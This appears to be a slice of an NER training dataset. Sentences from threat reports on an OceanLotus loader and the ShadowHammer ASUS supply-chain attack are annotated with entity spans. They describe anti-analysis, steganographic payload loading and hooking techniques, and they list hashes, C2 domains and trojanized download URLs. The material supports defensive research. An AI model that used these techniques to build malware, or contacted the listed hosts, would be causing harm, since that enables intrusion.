{"text": "Implementation of an additional anti-analysis check that compares the name of the parent process to a string stored in an encrypted resource .", "spans": {}, "info": {"id": "aptner_train_000847", "source": "aptner_train"}}
{"text": "We came across multiple variations of this DLL containing different parent process names , possibly targeted specifically to the victim’s environment .", "spans": {"System: DLL": [[43, 46]]}, "info": {"id": "aptner_train_000848", "source": "aptner_train"}}
{"text": "Some of these names include processes related to security software :", "spans": {}, "info": {"id": "aptner_train_000849", "source": "aptner_train"}}
{"text": "wsc_proxy.exe plugins-setup.exe SoftManager.exe GetEFA.exe .", "spans": {"Indicator: wsc_proxy.exe": [[0, 13]], "Indicator: plugins-setup.exe": [[14, 31]], "Indicator: SoftManager.exe": [[32, 47]], "Indicator: GetEFA.exe": [[48, 58]]}, "info": {"id": "aptner_train_000850", "source": "aptner_train"}}
{"text": "Features :", "spans": {}, "info": {"id": "aptner_train_000851", "source": "aptner_train"}}
{"text": "Side-loaded DLL Anti-debugging/anti-sandboxing check for parent process name .", "spans": {"System: DLL": [[12, 15]]}, "info": {"id": "aptner_train_000852", "source": "aptner_train"}}
{"text": "Loads next-stage payload using custom .png steganography .", "spans": {"System: custom .png steganography": [[31, 56]]}, "info": {"id": "aptner_train_000853", "source": "aptner_train"}}
{"text": "Uses AES128 implementation from Crypto++ library for payload decryption .", "spans": {"System: Crypto++ library": [[32, 48]]}, "info": {"id": "aptner_train_000854", "source": "aptner_train"}}
{"text": "Executes the payload by overwriting the return address on the stack .", "spans": {}, "info": {"id": "aptner_train_000855", "source": "aptner_train"}}
{"text": "Known to load an updated version of Remy backdoor .", "spans": {"Malware: Remy backdoor": [[36, 49]]}, "info": {"id": "aptner_train_000856", "source": "aptner_train"}}
{"text": "This DLL does not contain an export table and its entire functionality resides in the DllMain routine .", "spans": {"System: DLL": [[5, 8]], "System: DllMain": [[86, 93]]}, "info": {"id": "aptner_train_000857", "source": "aptner_train"}}
{"text": "Upon execution , the malware will first decrypt a string from its resources and compare it against the name of the parent process .", "spans": {}, "info": {"id": "aptner_train_000858", "source": "aptner_train"}}
{"text": "If the names differ , the malware will simply exit without touching the payload .", "spans": {}, "info": {"id": "aptner_train_000859", "source": "aptner_train"}}
{"text": "The resource containing the expected process name ( ICON/1 ) is XORed with the first byte of the legitimate C:\\Windows\\system.ini file – 0x3B ( \" ; \" ) .", "spans": {"Indicator: C:\\Windows\\system.ini": [[108, 129]]}, "info": {"id": "aptner_train_000860", "source": "aptner_train"}}
{"text": "If the parent name matches , the malware will traverse the stack in order to find a return address that falls into the memory of the parent process’s text section .", "spans": {}, "info": {"id": "aptner_train_000861", "source": "aptner_train"}}
{"text": "Next , the payload is read from the .png cover file , which seems to have been taken from an inspirational quotes website3 .", "spans": {}, "info": {"id": "aptner_train_000862", "source": "aptner_train"}}
{"text": "In this instance , the payload is fully contained within the image’s pixel color codes , leaving no remaining data beyond the IEND marker .", "spans": {}, "info": {"id": "aptner_train_000863", "source": "aptner_train"}}
{"text": "Finally , the loader will decrypt the payload to a memory buffer and overwrite the previously found return address with the pointer to that buffer , ensuring that the malicious shellcode will be executed when the DLL attempts to return to the caller .", "spans": {"System: DLL": [[213, 216]]}, "info": {"id": "aptner_train_000864", "source": "aptner_train"}}
{"text": "The loader embedded in the payload seems to be a variant of the Veil \" shellcode_inject \" payload , previously used by OceanLotus to load older versions of Remy backdoor .", "spans": {"System: Veil": [[64, 68]], "System: shellcode_inject": [[71, 87]], "Organization: OceanLotus": [[119, 129]], "Malware: Remy backdoor": [[156, 169]]}, "info": {"id": "aptner_train_000865", "source": "aptner_train"}}
{"text": "In this instance , the shellcode is configured to load an encoded backdoor from within the payload .", "spans": {}, "info": {"id": "aptner_train_000866", "source": "aptner_train"}}
{"text": "The final payload comes in a form of a launcher DLL that contains an encrypted backdoor in its .rdata section and a plain-text configuration in its resources .", "spans": {"System: DLL": [[48, 51]]}, "info": {"id": "aptner_train_000867", "source": "aptner_train"}}
{"text": "The resources also store one or more C2 communication modules .", "spans": {"System: C2": [[37, 39]]}, "info": {"id": "aptner_train_000868", "source": "aptner_train"}}
{"text": "The backdoor DLL and the C2 communication DLLs are heavily obfuscated using high quantities of junk code , which significantly inflates their size and makes both static analysis and debugging more difficult .", "spans": {"System: DLL": [[13, 16]], "System: C2": [[25, 27]]}, "info": {"id": "aptner_train_000869", "source": "aptner_train"}}
{"text": "In addition to Denes and Remy backdoors , at least two different communication modules were observed with different versions of this launcher – DNSProvider and HTTPProv .", "spans": {"Malware: Denes": [[15, 20]], "Malware: Remy backdoors": [[25, 39]], "System: DNSProvider": [[144, 155]], "System: HTTPProv": [[160, 168]]}, "info": {"id": "aptner_train_000870", "source": "aptner_train"}}
{"text": "The launcher binary , which contains the final backdoor , is RC4 encrypted and wrapped in a layer of obfuscated shellcode .", "spans": {}, "info": {"id": "aptner_train_000871", "source": "aptner_train"}}
{"text": "We can see the familiar DOS stub in plain text , but the rest of the header and binary body are encrypted .", "spans": {}, "info": {"id": "aptner_train_000872", "source": "aptner_train"}}
{"text": "The shellcode is obfuscated using OceanLotus ’s standard approach of flattening the control flow and inserting junk opcodes ( as described in the ESET white paper on OceanLotus ) .", "spans": {"Organization: OceanLotus": [[34, 44], [166, 176]], "Organization: ESET": [[146, 150]]}, "info": {"id": "aptner_train_000873", "source": "aptner_train"}}
{"text": "The shellcode starts in a fairly standard way – by walking the list of loaded modules in order to find the base of kernel32.dll library .", "spans": {"Indicator: kernel32.dll": [[115, 127]]}, "info": {"id": "aptner_train_000874", "source": "aptner_train"}}
{"text": "Once kernel32 base is found , the shellcode will calculate the addresses of LoadLibraryA and GetProcAddress functions , and use them to resolve other necessary APIs , which include VirtualAlloc , RtlMoveMemory , and RtlZeroMemory .", "spans": {"System: kernel32": [[5, 13]], "System: LoadLibraryA": [[76, 88]], "System: GetProcAddress": [[93, 107]], "System: APIs": [[160, 164]], "System: VirtualAlloc": [[181, 193]], "System: RtlMoveMemory": [[196, 209]], "System: RtlZeroMemory": [[216, 229]]}, "info": {"id": "aptner_train_000875", "source": "aptner_train"}}
{"text": "After resolving the APIs , the shellcode will decrypt the launcher binary and load it to the memory .", "spans": {"System: APIs": [[20, 24]]}, "info": {"id": "aptner_train_000876", "source": "aptner_train"}}
{"text": "MZ header , PE header , as well as each section and their header , are decrypted separately using RC4 algorithm and a hardcoded key .", "spans": {"System: RC4": [[98, 101]]}, "info": {"id": "aptner_train_000877", "source": "aptner_train"}}
{"text": "Once all sections are loaded , the relocations get fixed and the MZ/PE headers are zeroed out in memory .", "spans": {}, "info": {"id": "aptner_train_000878", "source": "aptner_train"}}
{"text": "The shellcode then proceeds to execute the payload DLL’s entry point .", "spans": {}, "info": {"id": "aptner_train_000879", "source": "aptner_train"}}
{"text": "The Internal name of this DLL is a randomly looking CLSID and it only exports one function called DllEntry .", "spans": {"System: DLL": [[26, 29]], "System: CLSID": [[52, 57]], "System: DllEntry": [[98, 106]]}, "info": {"id": "aptner_train_000880", "source": "aptner_train"}}
{"text": "Upon execution , the launcher will attempt to hook legitimate wininet.dll library by overwriting its entry point in memory with the address of a malicious routine .", "spans": {"Indicator: wininet.dll": [[62, 73]]}, "info": {"id": "aptner_train_000881", "source": "aptner_train"}}
{"text": "If successful , every time the system loads wininet.dll , the entry point of the subsequently dropped backdoor DLL will be executed before the original wininet entry point .", "spans": {"Indicator: wininet.dll": [[44, 55]], "System: DLL": [[111, 114]]}, "info": {"id": "aptner_train_000882", "source": "aptner_train"}}
{"text": "There is no proper DLL injection routine – the payload is just decompressed to the memory as-is – so the malware needs to fix all the pointers in the decompressed code , which is done on a one-by-one basis using hardcoded values and offsets .", "spans": {"System: DLL": [[19, 22]]}, "info": {"id": "aptner_train_000883", "source": "aptner_train"}}
{"text": "This part takes 90% of the whole launcher code and includes over 11 , 000 modifications .", "spans": {}, "info": {"id": "aptner_train_000884", "source": "aptner_train"}}
{"text": "The launcher then calls the backdoor DLL’s entry point .", "spans": {}, "info": {"id": "aptner_train_000885", "source": "aptner_train"}}
{"text": "The routine that reads configuration from resources and decompresses the C2 communication library is then called by temporarily replacing the pointer to CComCriticalSection function with the pointer to that routine .", "spans": {"System: C2": [[73, 75]], "System: CComCriticalSection": [[153, 172]]}, "info": {"id": "aptner_train_000886", "source": "aptner_train"}}
{"text": "Such an obfuscation method makes it difficult to spot it in the code .", "spans": {}, "info": {"id": "aptner_train_000887", "source": "aptner_train"}}
{"text": "The launcher loads configuration from resources and uses an export from the backdoor DLL to initialize config values in memory .", "spans": {"System: DLL": [[85, 88]]}, "info": {"id": "aptner_train_000888", "source": "aptner_train"}}
{"text": "Resource P1/1 contains config values , including port number and a registry path .", "spans": {}, "info": {"id": "aptner_train_000889", "source": "aptner_train"}}
{"text": "After the content of resource 0xC8 is decompressed , another function from the backdoor DLL is used to load the C2 communication module to the memory and call its \" CreateInstance \" export .", "spans": {"System: DLL": [[88, 91]], "System: C2": [[112, 114]], "System: CreateInstance": [[165, 179]]}, "info": {"id": "aptner_train_000890", "source": "aptner_train"}}
{"text": "Finally , the launcher passes control to the main backdoor routine .", "spans": {}, "info": {"id": "aptner_train_000891", "source": "aptner_train"}}
{"text": "OceanLotus : 0 4 name is read from resource P1/0x64 .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000892", "source": "aptner_train"}}
{"text": "OceanLotus : {12C044FA-A4AB-433B-88A2-32C3451476CE} memory pointer 4 points to a function that spawns another copy of malicious process .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000893", "source": "aptner_train"}}
{"text": "OceanLotus : {9E3BD021-B5AD-49DEAE93-F178329EE0FE} C&C URLs varies content is read from resource P1/2 .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000894", "source": "aptner_train"}}
{"text": "OceanLotus : 0 config varies content is read from resource P1/1 .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000895", "source": "aptner_train"}}
{"text": "OceanLotus : {B578B063-93FB-4A5F-82B4-4E6C5EBD393B} ? 4 0 ( config+0x486 ) .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000896", "source": "aptner_train"}}
{"text": "OceanLotus : {5035383A-F7B0-424A-9C9A-CA667416BA6F} port number 4 0x1BB ( 443 ) ( config+0x46C ) .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000897", "source": "aptner_train"}}
{"text": "OceanLotus : {68DDB1F1-E31F-42A9-A35D-984B99ECBAAD} registry path varies SOFTWARE\\Classes\\CLSID\\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000898", "source": "aptner_train"}}
{"text": "The backdoor DLL is stored in the .rdata section of the launcher , compressed with LZMA , and encrypted with RC4 .", "spans": {"System: DLL": [[13, 16]], "System: LZMA": [[83, 87]], "System: RC4": [[109, 112]]}, "info": {"id": "aptner_train_000899", "source": "aptner_train"}}
{"text": "The binary is heavily obfuscated with overlapping blocks of garbage code enclosed in pushf/popf instructions .", "spans": {}, "info": {"id": "aptner_train_000900", "source": "aptner_train"}}
{"text": "The DllMain function replaces the pointer to GetModuleHandleA API with a pointer to hook routine that will return the base of the backdoor DLL when called with NULL as parameter ( instead of returing the handle to the launcher DLL ) .", "spans": {"System: DllMain": [[4, 11]], "System: GetModuleHandleA API": [[45, 65]], "System: DLL": [[139, 142], [227, 230]]}, "info": {"id": "aptner_train_000901", "source": "aptner_train"}}
{"text": "The backdoor also contains an export that loads the C2 communication module reflectively to the memory from resource passed as parameter and then calls its \" CreateInstance \" export .", "spans": {"System: C2": [[52, 54]], "System: CreateInstance": [[158, 172]]}, "info": {"id": "aptner_train_000902", "source": "aptner_train"}}
{"text": "While we are still in the process of analyzing this backdoor’s full functionality , it seems to be similar to the Remy backdoor described in our previous whitepaper on OceanLotus malware .", "spans": {"Malware: Remy backdoor": [[114, 127]], "Organization: OceanLotus": [[168, 178]]}, "info": {"id": "aptner_train_000903", "source": "aptner_train"}}
{"text": "This DLL is stored in the launcher’s resources and compressed with LZMA .", "spans": {"System: DLL": [[5, 8]], "System: LZMA": [[67, 71]]}, "info": {"id": "aptner_train_000904", "source": "aptner_train"}}
{"text": "It’s also heavily obfuscated , but in a slightly different way than the backdoor .", "spans": {}, "info": {"id": "aptner_train_000905", "source": "aptner_train"}}
{"text": "Although it doesn’t contain an internal name , we believe it’s a variant of HttpProv library , as described in the ESET white paper on OceanLotus .", "spans": {"System: HttpProv library": [[76, 92]], "Organization: ESET": [[115, 119]], "Organization: OceanLotus": [[135, 145]]}, "info": {"id": "aptner_train_000906", "source": "aptner_train"}}
{"text": "This module is used by the backdoor during HTTP/HTTPS communication with the C2 server and has a proxy bypass functionality .", "spans": {"System: C2": [[77, 79]]}, "info": {"id": "aptner_train_000907", "source": "aptner_train"}}
{"text": "OceanLotus : ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 Loader #1 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4": [[13, 77]]}, "info": {"id": "aptner_train_000908", "source": "aptner_train"}}
{"text": "OceanLotus : 0ee693e714be91fd947954daee85d2cd8d3602e9d8a840d520a2b17f7c80d999 Loader #1 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: 0ee693e714be91fd947954daee85d2cd8d3602e9d8a840d520a2b17f7c80d999": [[13, 77]]}, "info": {"id": "aptner_train_000909", "source": "aptner_train"}}
{"text": "OceanLotus : a2719f203c3e8dcdcc714dd3c1b60a4cbb5f7d7296dbb88b2a756d85bf0e9c1e Loader #1 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: a2719f203c3e8dcdcc714dd3c1b60a4cbb5f7d7296dbb88b2a756d85bf0e9c1e": [[13, 77]]}, "info": {"id": "aptner_train_000910", "source": "aptner_train"}}
{"text": "OceanLotus : 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d Loader #2 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d": [[13, 77]]}, "info": {"id": "aptner_train_000911", "source": "aptner_train"}}
{"text": "OceanLotus : e0fc83e57fbbb81cbd07444a61e56e0400f7c54f80242289779853e38beb341e Loader #2 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: e0fc83e57fbbb81cbd07444a61e56e0400f7c54f80242289779853e38beb341e": [[13, 77]]}, "info": {"id": "aptner_train_000912", "source": "aptner_train"}}
{"text": "OceanLotus : cd67415dd634fd202fa1f05aa26233c74dc85332f70e11469e02b370f3943b1d Loader #2 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: cd67415dd634fd202fa1f05aa26233c74dc85332f70e11469e02b370f3943b1d": [[13, 77]]}, "info": {"id": "aptner_train_000913", "source": "aptner_train"}}
{"text": "OceanLotus : 9112f23e15fdcf14a58afa424d527f124a4170f57bd7411c82a8cdc716f6e934 Loader #2 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: 9112f23e15fdcf14a58afa424d527f124a4170f57bd7411c82a8cdc716f6e934": [[13, 77]]}, "info": {"id": "aptner_train_000914", "source": "aptner_train"}}
{"text": "OceanLotus : ecaeb1b321472f89b6b3c5fb87ec3df3d43a10894d18b575d98287b81363626f Loader #2 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: ecaeb1b321472f89b6b3c5fb87ec3df3d43a10894d18b575d98287b81363626f": [[13, 77]]}, "info": {"id": "aptner_train_000915", "source": "aptner_train"}}
{"text": "OceanLotus : 478cc5faadd99051a5ab48012c494a807c7782132ba4f33b9ad9229a696f6382 Loader #2 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: 478cc5faadd99051a5ab48012c494a807c7782132ba4f33b9ad9229a696f6382": [[13, 77]]}, "info": {"id": "aptner_train_000916", "source": "aptner_train"}}
{"text": "OceanLotus : 72441fe221c6a25b3792d18f491c68254e965b0401a845829a292a1d70b2e49a Payload PNG ( loader #1 ) .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: 72441fe221c6a25b3792d18f491c68254e965b0401a845829a292a1d70b2e49a": [[13, 77]]}, "info": {"id": "aptner_train_000917", "source": "aptner_train"}}
{"text": "OceanLotus : 11b4c284b3c8b12e83da0b85f59a589e8e46894fa749b847873ed6bab2029c0f Payload PNG ( loader #2 ) .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: 11b4c284b3c8b12e83da0b85f59a589e8e46894fa749b847873ed6bab2029c0f": [[13, 77]]}, "info": {"id": "aptner_train_000918", "source": "aptner_train"}}
{"text": "OceanLotus : d78a83e9bf4511c33eaab9a33ebf7ccc16e104301a7567dd77ac3294474efced Payload PNG ( loader #2 ) .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: d78a83e9bf4511c33eaab9a33ebf7ccc16e104301a7567dd77ac3294474efced": [[13, 77]]}, "info": {"id": "aptner_train_000919", "source": "aptner_train"}}
{"text": "OceanLotus : E:\\ProjectGit\\SHELL\\BrokenSheild\\BrokenShieldPrj\\Bin\\x86\\Release\\DllExportx86.pdb Loader #1 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: E:\\ProjectGit\\SHELL\\BrokenSheild\\BrokenShieldPrj\\Bin\\x86\\Release\\DllExportx86.pdb": [[13, 94]]}, "info": {"id": "aptner_train_000920", "source": "aptner_train"}}
{"text": "OceanLotus : C:\\Users\\Meister\\Documents\\Projects\\BrokenShield\\Bin\\x86\\Release\\BrokenShield.pdb Loader #2 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: C:\\Users\\Meister\\Documents\\Projects\\BrokenShield\\Bin\\x86\\Release\\BrokenShield.pdb": [[13, 94]]}, "info": {"id": "aptner_train_000921", "source": "aptner_train"}}
{"text": "OceanLotus : kermacrescen.com 7244 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: kermacrescen.com": [[13, 29]]}, "info": {"id": "aptner_train_000922", "source": "aptner_train"}}
{"text": "OceanLotus : stellefaff.com 7244 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: stellefaff.com": [[13, 27]]}, "info": {"id": "aptner_train_000923", "source": "aptner_train"}}
{"text": "OceanLotus : manongrover.com 7244 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: manongrover.com": [[13, 28]]}, "info": {"id": "aptner_train_000924", "source": "aptner_train"}}
{"text": "OceanLotus : background.ristians.com:8888 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: background.ristians.com:8888": [[13, 41]]}, "info": {"id": "aptner_train_000925", "source": "aptner_train"}}
{"text": "OceanLotus : enum.arkoorr.com:8531 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: enum.arkoorr.com:8531": [[13, 34]]}, "info": {"id": "aptner_train_000926", "source": "aptner_train"}}
{"text": "OceanLotus : worker.baraeme.com:8888 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: worker.baraeme.com:8888": [[13, 36]]}, "info": {"id": "aptner_train_000927", "source": "aptner_train"}}
{"text": "OceanLotus : enum.arkoorr.com:8888 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: enum.arkoorr.com:8888": [[13, 34]]}, "info": {"id": "aptner_train_000928", "source": "aptner_train"}}
{"text": "OceanLotus : worker.baraeme.com:8531 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: worker.baraeme.com:8531": [[13, 36]]}, "info": {"id": "aptner_train_000929", "source": "aptner_train"}}
{"text": "OceanLotus : plan.evillese.com:8531 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: plan.evillese.com:8531": [[13, 35]]}, "info": {"id": "aptner_train_000930", "source": "aptner_train"}}
{"text": "OceanLotus : background.ristians.com:8531 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: background.ristians.com:8531": [[13, 41]]}, "info": {"id": "aptner_train_000931", "source": "aptner_train"}}
{"text": "OceanLotus : plan.evillese.com:8888 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: plan.evillese.com:8888": [[13, 35]]}, "info": {"id": "aptner_train_000932", "source": "aptner_train"}}
{"text": "OceanLotus : SOFTWARE\\Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B} 7244 .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000933", "source": "aptner_train"}}
{"text": "OceanLotus : SOFTWARE\\App\\AppX06c7130ad61f4f60b50394b8cba3d35f\\Applicationz 7244 .", "spans": {"Organization: OceanLotus": [[0, 10]], "System: SOFTWARE\\App\\AppX06c7130ad61f4f60b50394b8cba3d35f\\Applicationz": [[13, 75]]}, "info": {"id": "aptner_train_000934", "source": "aptner_train"}}
{"text": "OceanLotus : SOFTWARE\\Classes\\CLSID\\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000935", "source": "aptner_train"}}
{"text": "Operation ShadowHammer .", "spans": {}, "info": {"id": "aptner_train_000936", "source": "aptner_train"}}
{"text": "Earlier today , Motherboard published a story by Kim Zetter on Operation ShadowHammer , a newly discovered supply chain attack that leveraged ASUS Live Update software .", "spans": {"Organization: Motherboard": [[16, 27]], "System: ASUS Live Update": [[142, 158]]}, "info": {"id": "aptner_train_000937", "source": "aptner_train"}}
{"text": "While the investigation is still in progress and full results and technical paper will be published during SAS 2019 conference in Singapore , we would like to share some important details about the attack .", "spans": {}, "info": {"id": "aptner_train_000938", "source": "aptner_train"}}
{"text": "In January 2019 , we discovered a sophisticated supply chain attack involving the ASUS Live Update Utility .", "spans": {"System: ASUS Live Update Utility": [[82, 106]]}, "info": {"id": "aptner_train_000939", "source": "aptner_train"}}
{"text": "The attack took place between June and November 2018 and according to our telemetry , it affected a large number of users .", "spans": {}, "info": {"id": "aptner_train_000940", "source": "aptner_train"}}
{"text": "ASUS Live Update is an utility that is pre-installed on most ASUS computers and is used to automatically update certain components such as BIOS , UEFI , drivers and applications .", "spans": {"System: ASUS Live Update": [[0, 16]], "Organization: ASUS": [[61, 65]], "System: BIOS": [[139, 143]], "System: UEFI": [[146, 150]], "System: drivers": [[153, 160]], "System: applications": [[165, 177]]}, "info": {"id": "aptner_train_000941", "source": "aptner_train"}}
{"text": "According to Gartner , ASUS is the world’s 5th-largest PC vendor by 2017 unit sales .", "spans": {"Organization: Gartner": [[13, 20]], "Organization: ASUS": [[23, 27]]}, "info": {"id": "aptner_train_000942", "source": "aptner_train"}}
{"text": "This makes it an extremely attractive target for APT groups that might want to take advantage of their userbase .", "spans": {}, "info": {"id": "aptner_train_000943", "source": "aptner_train"}}
{"text": "Based on our statistics , over 57 , 000 Kaspersky users have downloaded and installed the backdoored version of ASUS Live Update at some point in time .", "spans": {"Organization: Kaspersky": [[40, 49]], "System: ASUS Live Update": [[112, 128]]}, "info": {"id": "aptner_train_000944", "source": "aptner_train"}}
{"text": "We are not able to calculate the total count of affected users based only on our data ; however , we estimate that the real scale of the problem is much bigger and is possibly affecting over a million users worldwide .", "spans": {}, "info": {"id": "aptner_train_000945", "source": "aptner_train"}}
{"text": "The goal of the attack was to surgically target an unknown pool of users , which were identified by their network adapters’ MAC addresses .", "spans": {}, "info": {"id": "aptner_train_000946", "source": "aptner_train"}}
{"text": "To achieve this , the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation .", "spans": {}, "info": {"id": "aptner_train_000947", "source": "aptner_train"}}
{"text": "We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack .", "spans": {}, "info": {"id": "aptner_train_000948", "source": "aptner_train"}}
{"text": "Of course , there might be other samples out there with different MAC addresses in their list .", "spans": {}, "info": {"id": "aptner_train_000949", "source": "aptner_train"}}
{"text": "We believe this to be a very sophisticated supply chain attack , which matches or even surpasses the Shadowpad and the CCleaner incidents in complexity and techniques .", "spans": {}, "info": {"id": "aptner_train_000950", "source": "aptner_train"}}
{"text": "The reason that it stayed undetected for so long is partly due to the fact that the trojanized updaters were signed with legitimate certificates ( eg : “ ASUSTeK Computer Inc. ” ) .", "spans": {}, "info": {"id": "aptner_train_000951", "source": "aptner_train"}}
{"text": "The malicious updaters were hosted on the official liveupdate01s.asus.com and liveupdate01.asus.com ASUS update servers .", "spans": {"Indicator: liveupdate01s.asus.com": [[51, 73]], "Indicator: liveupdate01.asus.com": [[78, 99]], "Organization: ASUS": [[100, 104]]}, "info": {"id": "aptner_train_000952", "source": "aptner_train"}}
{"text": "We have contacted ASUS and informed them about the attack on Jan 31 , 2019 , supporting their investigation with IOCs and descriptions of the malware .", "spans": {"Organization: ASUS": [[18, 22]]}, "info": {"id": "aptner_train_000953", "source": "aptner_train"}}
{"text": "Although precise attribution is not available at the moment , certain evidence we have collected allows us to link this attack to the ShadowPad incident from 2017 .", "spans": {}, "info": {"id": "aptner_train_000954", "source": "aptner_train"}}
{"text": "The actor behind the ShadowPad incident has been publicly identified by Microsoft in court documents as BARIUM .", "spans": {"Organization: Microsoft": [[72, 81]], "Organization: BARIUM": [[104, 110]]}, "info": {"id": "aptner_train_000955", "source": "aptner_train"}}
{"text": "BARIUM is an APT actor known to be using the Winnti backdoor .", "spans": {"Organization: BARIUM": [[0, 6]], "Malware: Winnti backdoor": [[45, 60]]}, "info": {"id": "aptner_train_000956", "source": "aptner_train"}}
{"text": "Recently , our colleagues from ESET wrote about another supply chain attack in which BARIUM was also involved , that we believe is connected to this case as well .", "spans": {"Organization: ESET": [[31, 35]], "Organization: BARIUM": [[85, 91]]}, "info": {"id": "aptner_train_000957", "source": "aptner_train"}}
{"text": "It should be noted that the numbers are also highly influenced by the distribution of Kaspersky users around the world .", "spans": {"Organization: Kaspersky": [[86, 95]]}, "info": {"id": "aptner_train_000958", "source": "aptner_train"}}
{"text": "In principle , the distribution of victims should match the distribution of ASUS users around the world .", "spans": {}, "info": {"id": "aptner_train_000959", "source": "aptner_train"}}
{"text": "We’ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack .", "spans": {}, "info": {"id": "aptner_train_000960", "source": "aptner_train"}}
{"text": "To check this , it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found .", "spans": {}, "info": {"id": "aptner_train_000961", "source": "aptner_train"}}
{"text": "Download an archive with the tool ( .exe ) .", "spans": {"Indicator: .exe": [[36, 40]]}, "info": {"id": "aptner_train_000962", "source": "aptner_train"}}
{"text": "Also , you may check MAC addresses online .", "spans": {}, "info": {"id": "aptner_train_000963", "source": "aptner_train"}}
{"text": "If you discover that you have been targeted by this operation , please e-mail us at : shadowhammer@kaspersky.com .", "spans": {"System: e-mail": [[71, 77]]}, "info": {"id": "aptner_train_000964", "source": "aptner_train"}}
{"text": "Kaspersky Lab verdicts for the malware used in this and related attacks .", "spans": {"Organization: Kaspersky Lab": [[0, 13]]}, "info": {"id": "aptner_train_000965", "source": "aptner_train"}}
{"text": "ShadowHammer : HEUR : Trojan.Win32.ShadowHammer.gen .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Malware: HEUR": [[15, 19]], "Malware: Trojan.Win32.ShadowHammer.gen": [[22, 51]]}, "info": {"id": "aptner_train_000966", "source": "aptner_train"}}
{"text": "ShadowHammer : asushotfix.com .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: asushotfix.com": [[15, 29]]}, "info": {"id": "aptner_train_000967", "source": "aptner_train"}}
{"text": "ShadowHammer : 141.105.71.116 .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: 141.105.71.116": [[15, 29]]}, "info": {"id": "aptner_train_000968", "source": "aptner_train"}}
{"text": "ShadowHammer : http://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: http://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip": [[15, 107]]}, "info": {"id": "aptner_train_000969", "source": "aptner_train"}}
{"text": "ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip": [[15, 109]]}, "info": {"id": "aptner_train_000970", "source": "aptner_train"}}
{"text": "ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip": [[15, 109]]}, "info": {"id": "aptner_train_000971", "source": "aptner_train"}}
{"text": "ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip": [[15, 109]]}, "info": {"id": "aptner_train_000972", "source": "aptner_train"}}
